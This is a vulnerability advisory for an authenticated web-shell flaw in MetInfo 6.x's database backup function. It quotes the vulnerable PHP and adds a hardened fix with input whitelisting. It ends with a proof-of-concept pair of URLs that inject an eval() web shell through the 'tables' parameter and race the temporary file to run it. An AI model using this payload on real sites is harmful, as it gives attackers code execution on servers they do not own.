MetInfo 6.x admin backend getshell
Description: An issue was discovered in MetInfo 6.x. An attacker who is logged in to the admin backend can abuse the database backup function to write a web shell.
1. Technical Description:
The vulnerable code is in /app/system/databack/admin/index.class.php, lines 456 to 478:
    public function dogetsql($table='') {
        global $_M;
        // $tables is taken straight from the request when no $table argument is given
        if($_M['form']['tables'] && !$table) $table = $_M['form']['tables'];
        $localurl = $_M['config']['met_weburl'];
        $tablepre = $_M['config']['tablepre'];
        $fileid = isset($_M['form']['fileid']) ? $_M['form']['fileid'] : 1;
        if($table){
            $tables = $table;
        }else{
            $tables = $this->dotableprearray($tablepre);
        }
        $sizelimit = 2048;
        if($fileid==1){
            $random = isset($_M['form']['random']) ? $_M['form']['random'] : met_rand(6);
            // the request-controlled value is written to a .php file under the web root
            $this->docache_write('bakup_tables.php', $tables);
        }elseif(!$tbl){
            $random = isset($_M['form']['random']) ? $_M['form']['random'] : met_rand(6);
            $allidlist = explode('|', $tablestx);
            for($i=0; $i<count($allidlist)-1; $i++){
                $tables[$i] = $allidlist[$i];
            }
        }
If 'tables' is posted as a string instead of an array, the program calls docache_write, located at lines 334 to 351:
    function docache_write($file, $string, $type = 'array'){
        global $_M;
        // only arrays are serialized; a plain string skips this block entirely
        if(is_array($string))
        {
            $type = strtolower($type);
            if($type == 'array')
            {
                $string = "<?php\n return ".var_export($string,TRUE).";\n?>";
            }
            elseif($type == 'constant')
            {
                $data = '';
                foreach($string as $key => $value) $data .= "define('".strtoupper($key)."','".addslashes($value)."');\n";
                $string = "<?php\n".$data."\n?>";
            }
        }
        // a string value is written verbatim into a .php file
        file_put_contents(PATH_WEB.ADMIN_FILE.'/databack/'.$file, $string);
    }
It creates a file named 'bakup_tables.php' in /admin/databack/, and its content is attacker-controlled. But at the end of dogetsql the program deletes the temporary file 'bakup_tables.php':
    $this->docache_delete('bakup_tables.php', $tables);
So a race condition is needed to get the file executed before it is removed.
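A hardened version of the two functions, added here as an illustration of the fix and not MetInfo's own patch. It assumes the same $_M['form'] request array and the PATH_WEB/ADMIN_FILE constants used above; the function names sanitize_table_list and docache_write_safe, the demo table list and the fallback constant values are hypothetical.

```php
<?php
// Added example (not MetInfo code): validate the table list before it reaches
// the cache writer, and make the writer refuse anything that is not an array.

// Fallbacks so the file runs stand-alone; MetInfo defines these itself.
if (!defined('PATH_WEB')) define('PATH_WEB', sys_get_temp_dir() . '/');
if (!defined('ADMIN_FILE')) define('ADMIN_FILE', 'admin');

// Return only names that are valid SQL identifiers AND exist in the database.
// $known_tables would come from SHOW TABLES in the real application.
function sanitize_table_list($input, array $known_tables): array {
    // Form input may arrive as a string ("a,b") or as an array.
    $candidates = is_array($input) ? $input : explode(',', (string)$input);
    $clean = [];
    foreach ($candidates as $name) {
        $name = trim((string)$name);
        // Strict identifier whitelist: letters, digits, underscore only.
        if ($name === '' || !preg_match('/^[A-Za-z0-9_]{1,64}$/', $name)) {
            continue;
        }
        // Whitelist against the real table list, not just a syntax check.
        if (in_array($name, $known_tables, true)) {
            $clean[] = $name;
        }
    }
    return array_values(array_unique($clean));
}

// Hardened writer: the file content is always a var_export()ed PHP array,
// so no request value can ever become PHP source code.
function docache_write_safe(string $file, $data): bool {
    if (!is_array($data)) {
        throw new InvalidArgumentException('docache_write expects an array');
    }
    // Fixed set of cache file names; no path components from the request.
    if (!in_array($file, ['bakup_tables.php'], true)) {
        throw new InvalidArgumentException('unexpected cache file name');
    }
    $dir = PATH_WEB . ADMIN_FILE . '/databack/';
    if (!is_dir($dir)) {
        return false;
    }
    $string = "<?php\n return " . var_export($data, true) . ";\n";
    // Write to a temp file and rename, so a concurrent reader never
    // observes a half-written file.
    $tmp = tempnam($dir, 'bak');
    if ($tmp === false || file_put_contents($tmp, $string, LOCK_EX) === false) {
        return false;
    }
    return rename($tmp, $dir . $file);
}

// Constructed demonstration input (not from a real request):
$known = ['met_admin_table', 'met_config', 'met_column'];
$tables = sanitize_table_list('met_config,<?php phpinfo();?>,met_column', $known);
var_dump($tables);
```

With the whitelist in place the injected string is dropped and only real table names survive, so even if the race is won the cached file contains nothing but a harmless array. Keeping the cache file outside the web root, or storing the table list in the admin session instead of a .php file, removes the race window altogether.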
2. PoC
Download the latest version (https://www.mituo.cn/upload/file/MetInfo6.1.3.zip), build a test site and open it in Google Chrome.
After the administrator has logged in, request this URL:
http://127.0.0.1/metinfo6.1.3/admin/index.php?n=databack&c=index&a=dogetsql&anyid=13&lang=cn&tables=<?php eval($_GET[2]);?>&fileid=1
At the same time, race it by requesting:
http://127.0.0.1/metinfo6.1.3/admin/databack/bakup_tables.php?2=file_put_contents('info.php','<?php%20phpinfo();?>');